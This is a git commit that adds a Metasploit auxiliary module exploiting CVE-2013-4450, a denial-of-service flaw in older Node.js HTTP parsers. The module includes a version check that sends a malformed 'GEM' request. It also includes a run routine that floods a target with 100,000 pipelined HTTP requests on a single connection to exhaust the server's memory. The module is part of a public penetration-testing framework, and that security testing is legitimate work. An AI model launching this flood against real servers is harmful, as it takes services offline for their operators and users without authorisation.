Land #2548, @titanous's aux module for CVE-2013-4450

2013-10-22 15:02:54 -05:00 · 2013-10-22 15:02:54 -05:00 · 6989f16661
parent 11b2719ccc bdf07456ba
commit 6989f16661
1 changed files with 90 additions and 0 deletions
--- a/modules/auxiliary/dos/http/nodejs_pipelining.rb
+++ b/modules/auxiliary/dos/http/nodejs_pipelining.rb
@ -0,0 +1,90 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Dos
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Node.js HTTP Pipelining DoS',
+      'Description'    => %q{
+        This module exploits a DoS in the HTTP parser of Node.js versions
+        released before 0.10.21 and 0.8.26. The attack sends many pipelined
+        HTTP requests on a single connection, which causes unbounded memory
+        allocation when the client does not read the responses.
+      },
+      'Author'         =>
+        [
+          'Marek Majkowski', # Vulnerability discovery
+          'titanous',        # Metasploit module
+          'joev'             # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2013-4450' ],
+          [ 'OSVDB', '98724' ],
+          [ 'BID' , '63229' ],
+          [ 'URL', 'http://blog.nodejs.org/2013/10/22/cve-2013-4450-http-server-pipeline-flood-dos' ]
+        ],
+      'DisclosureDate' => 'Oct 18 2013'))
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptInt.new('RLIMIT', [true,  "Number of requests to send", 100000])
+      ],
+    self.class)
+  end
+
+  def check
+    # http://blog.nodejs.org/2013/08/21/node-v0-10-17-stable/
+    # check if we are < 0.10.17 by seeing if a malformed HTTP request is accepted
+    status = Exploit::CheckCode::Unknown
+    connect
+    sock.put(http_request("GEM"))
+    begin
+      response = sock.get_once
+      status = Exploit::CheckCode::Appears if response =~ /HTTP/
+    rescue EOFError
+      # checking against >= 0.10.17 raises EOFError because there is no
+      # response to GEM requests
+    ensure
+      disconnect
+    end
+    status
+  end
+
+  def host
+      host = datastore['RHOST']
+      host += ":" + datastore['RPORT'].to_s if datastore['RPORT'] != 80
+      host
+  end
+
+  def http_request(method='GET')
+    "#{method} / HTTP/1.1\r\nHost: #{host}\r\n\r\n"
+  end
+
+  def run
+    payload = http_request
+    begin
+      print_status("Stressing the target memory...")
+      connect
+      datastore['RLIMIT'].times { sock.put(payload) }
+      print_status("Attack finished. If you read it, it wasn't enough to trigger an Out Of Memory condition.")
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+      print_status("Unable to connect to #{host}.")
+    rescue ::Errno::ECONNRESET, ::Errno::EPIPE, ::Timeout::Error
+      print_good("DoS successful. #{host} not responding. Out Of Memory condition probably reached")
+    ensure
+      disconnect
+    end
+  end
+end